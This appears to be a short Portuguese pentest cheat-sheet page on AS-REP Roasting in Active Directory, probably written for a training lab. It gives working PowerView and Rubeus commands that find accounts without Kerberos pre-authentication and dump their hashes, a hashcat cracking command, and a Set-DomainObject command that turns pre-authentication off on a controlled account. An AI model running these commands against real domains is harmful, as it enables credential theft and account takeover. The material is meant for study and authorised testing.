ASREPRoasting
Descrição
A tática principal num ataque AS-REP Roasting consiste em ter a pré-autenticação Kerberos desactivada. Nesse cenário, um atacante não precisa da palavra-passe do utilizador para obter uma resposta de autenticação(Figura 1). Quando o atacante tem a resposta, pode tentar decifrá-la offline para obter a palavra-passe em texto simples do utilizador.
Enumeração
Enumeração de contas do PowerShell com DONT_REQ_PREAUTH
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH
Também podemos usar
Rubeus.exe asreproast /format:hashcat
para enumerar todas as contas com o sinalizadorDONT_REQ_PREAUTH
.
.\Rubeus.exe asreproast /format:hashcat /nowrap
Executando o Ataque
PS C:\Tools> .\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt
Hash Cracking
C:\Tools\hashcat-6.2.6> hashcat.exe -m 18200 C:\Tools\hashes.txt C:\Tools\rockyou.txt -O
Definir DONT_REQ_PREAUTH com PowerView
Se descobrirmos que temos
GenericAll
privilégios em uma conta, em vez de redefinir a senha, podemos habilitar oDONT_REQ_PREAUTH
sinalizador para fazer uma solicitação para obter o hash dessa conta e tentar quebrá-la.
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose
Last updated